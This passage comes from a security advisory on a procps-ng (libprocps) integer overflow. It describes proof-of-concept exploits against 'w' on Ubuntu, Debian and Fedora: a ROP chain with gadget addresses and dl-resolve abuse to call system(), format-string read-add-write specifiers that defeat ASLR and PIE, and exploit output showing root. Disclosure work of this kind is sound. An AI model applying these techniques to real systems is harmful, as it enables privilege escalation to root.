not CLONE_THREAD, because each process must have its own /proc/PID  
entry): this is much faster, and significantly reduces the memory  
consumption of our exploit (the target "w" process itself already  
consumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the  
"mmap", "dist", and "wrap" processes);  
  
- we analyze the ~2GB command-line argument strings of our "dist" and  
"wrap" processes, to detect repeated patterns and replace them with  
our equivalent file-backed mmap()s (this further reduces the memory  
consumption of the exploit); moreover, we replace the argv[] pointers  
of these processes with PROT_NONE mmap()s (hundreds of megabytes that  
are never accessed);  
  
- we initially simulated readproctab() with our own exploit code, but  
eventually switched to a small LD_PRELOAD library that instruments the  
real "w" utility and provides more accurate measurements.  
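
The memory figures quoted above (64K chunks of 128KB, plus two rbufs of roughly 2GB each) can be checked with a short calculation. The helper names are illustrative, and the rbufs are rounded to exactly 2GB here, which is an assumption.

```c
#include <assert.h>
#include <stdint.h>

#define KIB ((uint64_t)1024)
#define GIB (KIB * KIB * KIB)

/* Bytes held by `chunks` allocations of `chunk_bytes` each. */
uint64_t mmap_chunks_bytes(uint64_t chunks, uint64_t chunk_bytes)
{
    return chunks * chunk_bytes;
}

/*
 * Approximate footprint of the target w: the chunks forced by the "mmap"
 * processes plus the rbufs of the "dist" and "wrap" processes.
 */
uint64_t w_footprint_bytes(void)
{
    return mmap_chunks_bytes(64 * KIB, 128 * KIB) + 2 * GIB + 2 * GIB;
}
```

The 64K chunks alone account for 8GB, and the two rbufs bring the total to 12GB, in line with the "over 12GB" stated above.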
  
There is much room for improvement in this proof-of-concept exploit: for  
example, it depends on the exact distance between our target structure  
(at the beginning of w's heap) and the rbuf of our "wrap" process (at  
the end of w's heap), but this distance is hard to measure inside a  
container, because processes running outside the container are not  
visible inside the container (brute-force may be a solution if the  
target utility is executed by a script, but not if it is executed  
manually by an administrator; better solutions may exist).  
  
========================================================================  
5.4. Non-PIE exploitation  
========================================================================  
  
In this section, we describe our simplest proof-of-concept exploit,  
against the non-PIE "w" on Ubuntu 16.04: we overflow the integer "tot"  
in file2strvec(), we overwrite the PROCTAB structure and its function  
pointers, and we jump into the executable segment of w. However, w is  
very small and contains no useful gadgets, syscall instructions, or  
library calls. Instead, we use a technique pioneered by Nergal in  
http://phrack.org/issues/58/4.html ("5 - The dynamic linker's  
dl-resolve() function"):  
  
We jump to the very beginning of w's PLT (Procedure Linkage Table),  
which calls _dl_runtime_resolve() and _dl_fixup() with a "reloc_arg"  
that we control (it is read from the stack) and that indexes our own  
fake Elf64_Rela structure (in w's heap), which in turn indexes a fake  
Elf64_Sym structure, which in turn indexes a string that we control and  
that allows us to call any library function, by name (even if it does  
not appear in w's PLT). The obvious choice here is the "system"  
function:  
  
- the RDI register (the first argument of the function pointer that we  
overwrote, and hence the command argument of system()) points to the  
PROCTAB structure, whose contents we control;  
  
- we do not need to worry about the privilege dropping of /bin/sh,  
because w is not a set-user-ID executable.  
  
Finally, we must solve two practical problems to use this dynamic-linker  
technique against w:  
  
- our fake ELF structures are located in the heap, but indexed from the  
executable, and a random gap separates the heap from the executable:  
we therefore allocate four large areas in the heap (large enough to  
defeat the randomization of the heap), one for each of our fake  
structures (Elf64_Rela, Elf64_Sym, "system", and ndx for symbol  
versioning);  
  
- malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym  
are 24-byte structures: luckily, the last 8 bytes of these structures  
are unused, and we therefore truncate our fake structures to 16 bytes.  
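
The size and alignment constraint can be checked against the definitions in <elf.h>. This is a small sketch, assuming a Linux system with glibc's <elf.h>; rela_entry_addr() and its jmprel parameter are hypothetical names, and the scaling of reloc_arg by sizeof(Elf64_Rela) reflects our understanding of x86-64 lazy binding rather than anything stated in this advisory.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/* Both structures are 24 bytes, which is not a multiple of 16. */
_Static_assert(sizeof(Elf64_Rela) == 24, "Elf64_Rela is 24 bytes");
_Static_assert(sizeof(Elf64_Sym) == 24, "Elf64_Sym is 24 bytes");

/* Their last 8 bytes (r_addend and st_size) start at offset 16. */
_Static_assert(offsetof(Elf64_Rela, r_addend) == 16, "r_addend at 16");
_Static_assert(offsetof(Elf64_Sym, st_size) == 16, "st_size at 16");

/*
 * Address of the relocation entry selected by reloc_arg, relative to the
 * start of the PLT relocation table (jmprel, a hypothetical parameter).
 */
uint64_t rela_entry_addr(uint64_t jmprel, uint64_t reloc_arg)
{
    return jmprel + reloc_arg * sizeof(Elf64_Rela);
}
```

Because entries are addressed in 24-byte steps while malloc() hands out 16-byte-aligned chunks, dropping the trailing 8 bytes is what lets a fake structure fit an aligned 16-byte slot.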
  
For example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with  
the following ROP chain:  
  
  procfs  taskdir  tdu  df   finder   reader  tfinder
|--------|--------|----+---|--------|--------|--------|------|--------|--------|
| id>>/tmp/w.$$        |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50|
|--------|--------|----+---|--------|--------|--------|------|--------|--------|
                                                    0xffb8 bytes
  
- the first gadget that we execute, 0x4020bb, pivots the stack pointer  
to RDI (which points to the very beginning of the PROCTAB structure):  
"push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;"  
  
- the second gadget that we execute, 0x4029db, increases the stack  
pointer by 0xffb8 bytes (it would otherwise crash into the beginning  
of the heap, because the stack grows down): "ret 0xffb8;"  
  
- the third gadget that we execute, 0x401100, calls  
_dl_runtime_resolve() and _dl_fixup() with our own "relocarg" (this  
effectively calls system() with the command located at RDI,  
"id>>/tmp/w.$$"):  
  
401100: ff 35 02 2f 20 00       pushq  0x202f02(%rip)
401106: ff 25 04 2f 20 00       jmpq   *0x202f04(%rip)
  
- the fourth gadget that we execute, 0x402a50, makes a clean exit:  
  
402a50: bf 01 00 00 00          mov    $0x1,%edi
402a55: e8 36 e7 ff ff          callq  401190 <_exit@plt>
  
$ ./w-exploit-Non-PIE  
positive_tot 2147482113  
distance_tot 2147482112  
distance 12024752  
...  
distance 12024752  
off 279917264  
ver_beg 2e26ce0 ver_end 5426ce0  
rel_beg 15f19fb0 rel_end 18519fb0  
str_beg 2900d280 str_end 2b60d280  
sym_beg 3c100570 sym_end 3e700570  
reloc_arg 16957128  
nentries 5  
POSITIVE_TOT 2147482113  
DISTANCE_TO_PT 1  
negwrite_off 2147485183  
nentries 1  
ready  
  
Then, if an administrator executes w:  
  
# cat /tmp/w.*  
cat: '/tmp/w.*': No such file or directory  
  
# w  
  
# cat /tmp/w.*  
uid=0(root) gid=0(root) groups=0(root)  
  
========================================================================  
5.5. PIE exploitation  
========================================================================  
  
In this section, we describe our proof-of-concept exploit against the  
PIE "w" on Debian 9 and Fedora 27. The first technique that we tried, a  
partial overwrite of a function pointer in the PROCTAB structure, does  
not work:  
  
- we are limited to a 2-byte overwrite, or else we lose the "one-shot"  
quality of our exploit (we must brute-force the random bits that we  
overwrite);  
  
- the original function pointer refers to a piece of code in libprocps  
that offers a very limited choice of gadgets;  
  
- file2strvec() ends our command-line argument strings (which overwrite  
the function pointer) with a null byte, and further reduces the number  
of available gadgets.  
  
Our second, working technique is derived from halfdog's fascinating  
https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and  
transforms libprocps's integer overflow and memory corruption into a  
format-string exploit:  
  
- we overwrite the dirname pointer to "/usr/share/locale" (a member of  
the struct binding malloc()ated at the very beginning of w's heap by  
bindtextdomain()) with a pointer to "/tmp" -- we do not need to worry  
about ASLR, because we arrange for file2strvec() to overwrite dirname  
with a pointer to our command-line argument strings; alternatively, we  
could overwrite the "procps-ng" string (malloc()ated at the beginning  
of w's heap by textdomain()), but this would also overwrite the chunk  
header of the struct PROCTAB, and would cause a crash in closeproc();  
  
- we thereby control the translation strings returned by the *gettext()  
functions and the _() macro (the overwritten dirname pointer is used  
to construct the names of the translation files ".mo") and therefore  
control two format-strings in w's main():  
  
591 printf(_("%-*s TTY "), userlen, _("USER"));  
...  
595 printf(_(" LOGIN@ IDLE JCPU PCPU WHAT\n"));  
  
- we exploit the first format-string to create a pointer to a saved RIP  
on the stack, and we write this pointer to the stack itself;  
  
- we use this pointer, and the second format-string, to overwrite the  
saved RIP with the address of a useful libc gadget (we return into  
popen() on Debian 9, and wordexp() on Fedora 27).  
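
To illustrate why control of dirname gives control of the translation
strings, the following Python sketch builds the catalog path in the
usual gettext layout (dirname/locale/LC_MESSAGES/domain.mo). It is a
simplified model: the helper mo_path() and the locale "fr" are
hypothetical, and a real lookup may try several variants of the locale
name before giving up.

```python
import posixpath

def mo_path(dirname, locale, domain, category="LC_MESSAGES"):
    """Return the catalog path of a gettext-style lookup (simplified)."""
    return posixpath.join(dirname, locale, category, domain + ".mo")

# Hypothetical locale of the user who runs "w".
locale = "fr"

before = mo_path("/usr/share/locale", locale, "procps-ng")
after = mo_path("/tmp", locale, "procps-ng")   # dirname overwritten

print(before)
print(after)
```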
  
However, unlike halfdog, we cannot defeat ASLR by simply dumping the
contents of the stack with a format-string, because we do not have
access to the output of "w" (it is executed by another user,
administrator, or script). Instead, we implement Chris Evans's
"read-add-write" primitive
https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-advancing-exploitation.html  
("Trick #6: co-opting an addition primitive") with format-strings only.  
  
With the first format-string:  
  
- we "read" the LSW (Least Significant Word, 32 bits) of a stack pointer  
that is located on the stack itself and hence accessible through the  
format-string arguments -- for example, the argv pointer;  
  
- we "add" a distribution-specific constant to this LSW, to make it  
point to a saved RIP on the stack -- for example, the saved RIP pushed  
onto the stack by the call to printf_positional() in vfprintf();  
  
- we "write" this modified LSW to the LSW of another stack pointer that  
is also located on the stack itself and hence accessible through the  
format-string arguments -- for example, the argv[0] pointer.  
  
With the second format-string:  
  
- we "read" the LSW of a libc pointer that is located on the stack and  
hence accessible through the format-string arguments -- for example,  
the pointer to __libc_start_main();  
  
- we "add" a distribution-specific constant to this LSW, to make it  
point to a useful libc gadget -- for example, popen() or wordexp();  
  
- we "write" this modified LSW to the LSW of a saved RIP on the stack:  
we use the pointer (to the saved RIP) created on the stack by the  
first format-string.  
  
To implement the "read-add-write" primitive:  
  
- we "read" the LSW of a pointer (we load it into vfprintf's internal  
character counter) through a variable-width specifier such as "%*R$x",  
where R is the position (among the format-string arguments on the  
stack) of the to-be-read pointer;  
  
- we "add" a constant A to this LSW through a constant-width specifier  
such as "%Ax";  
  
- we "write" this modified LSW to the LSW of another pointer through a  
specifier such as "%W$n", where W is the position (among the format-  
string arguments on the stack) of a pointer to the to-be-overwritten  
pointer (for example, in our first format-string we overwrite the LSW  
of the argv[0] pointer through the argv pointer, and in our second  
format-string we overwrite the LSW of a saved RIP through the  
overwritten argv[0] pointer); in summary:  
  
. if we want to "add" a constant to the LSW that we "read", we use a  
simple format-string such as "%*R$x%Ax%W$n", where A is equal to the  
constant that we want to add;  
  
. if we want to "subtract" a constant from the LSW that we "read", we  
use a format-string such as "%*R$x%W$n%Ax%W$hn", where A is equal to  
65536 minus the constant that we want to subtract (the smaller the  
constant, the higher the probability of success).  
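
The arithmetic of both variants can be modeled without calling printf at
all. The following Python sketch is a simplified model, not the exploit:
the function names and the sample pointer values are hypothetical, and
it assumes that every conversion outputs exactly its field width (that
is, the width is never smaller than the number of hex digits printed).

```python
MASK32 = 0xFFFFFFFF

def as_int32(value):
    """Interpret the low 32 bits of value as a signed C int."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value

def read(pointer):
    """Model of "%*R$x": the LSW is used as width and fills the counter."""
    width = as_int32(pointer)
    return width if width > 0 else None    # must be positive to work

def add_write(pointer, a):
    """Model of "%*R$x%Ax%W$n": the 32-bit value stored by %n."""
    counter = read(pointer)
    if counter is None:
        return None
    return (counter + a) & MASK32

def sub_write(pointer, c):
    """Model of "%*R$x%W$n%Ax%W$hn" with A = 65536 - c."""
    counter = read(pointer)
    if counter is None:
        return None
    stored = counter                       # %W$n writes the unchanged LSW
    counter += 65536 - c                   # %Ax
    return (stored & 0xFFFF0000) | (counter & 0xFFFF)   # %W$hn

# Hypothetical pointers, for illustration only.
ok = 0x00007FFC12345678
borrow = 0x00007FFC12340010    # low 16 bits smaller than the constant
negative = 0x00007FFC92345678  # LSW is negative as an int

print(hex(add_write(ok, 0x100)), hex(sub_write(ok, 0x100)))
print(hex(sub_write(borrow, 0x100)), add_write(negative, 0x100))
```

In this model the subtraction is correct only when the low 16 bits of
the LSW are at least as large as the constant (no borrow into the upper
16 bits), which is why smaller constants succeed more often.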
  
This generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it  
suffers from three major drawbacks:  
  
- it requires two different format-strings, because it must reset  
vfprintf's internal character counter between the two "read-add-write"  
primitives;  
  
- its probability of success is 1/4 (not a one-shot, but not a  
brute-force either), because the probability of success of each  
"read-add-write" primitive is 1/2 (the randomized LSW that is "read"  
as an "int width" must be positive), and the stack is randomized  
independently of the libc;  
  
- it outputs 2*1GB on average (2*2GB at most): this may be acceptable if  
the target utility is executed by a script or daemon, but not if it is  
executed manually by an administrator (terminal escape sequences may  
be used to overcome this drawback, but we have not explored this
possibility yet).
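
The figures in the last two drawbacks follow from short arithmetic. The
following Python sketch is a back-of-the-envelope check under a
simplifying assumption that is not stated in the measurements above: a
successful width is treated as uniformly distributed over 1..INT_MAX,
and the constants added afterwards are ignored.

```python
from fractions import Fraction

# Each primitive works only if the LSW read as "int width" is positive.
p_primitive = Fraction(1, 2)
# Stack and libc are randomized independently, so the two multiply.
p_exploit = p_primitive * p_primitive

INT_MAX = 2**31 - 1
GIB = 2**30

# Assumption: width uniform over 1..INT_MAX (bytes output per format-string).
mean_output = Fraction(1 + INT_MAX, 2)
worst_output = INT_MAX

print(p_exploit, mean_output / GIB, Fraction(worst_output, GIB))
```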
  
It is also possible to implement distribution-specific variants of this  
generic technique: for example, we developed a Debian-specific version  
of our "w" exploit that requires only one format-string, has an 11/12  
probability of success (nearly one-shot), and outputs only a few  
kilobytes. This is left as an exercise for the interested reader.  
  
  
========================================================================  
Acknowledgments  
========================================================================  
  
We thank Craig Small and the members of linux-distros@openwall and  
security@kernel.  
`